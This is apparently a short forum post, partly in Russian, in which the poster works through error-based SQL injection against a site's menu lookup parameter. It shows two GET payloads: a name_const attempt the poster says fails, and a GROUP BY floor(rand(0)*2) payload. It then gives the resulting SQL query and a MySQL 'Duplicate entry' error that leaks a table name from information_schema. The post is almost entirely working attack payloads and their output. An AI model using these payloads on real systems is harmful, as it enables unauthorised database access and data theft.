GET /m'|(select*from(select+name_const(version(),1),nam e_const(version(),1))a)='1

однако name_const здесь не сработает, нужен другой вектор. сейчас посмотрю

UPD:

GET /m'||1%20group%20by%20concat((select%20table_name%2 0from%20information_schema.tables%20limit%200,1),f loor(rand(0)*2))having%20min(0)='1

SQL: select * from mimik_Menus where lookup_code = 'm'||1 group by concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2))having min(0)='1'

MySQL_ERROR: Duplicate entry 'CHARACTER_SETS1' for key 1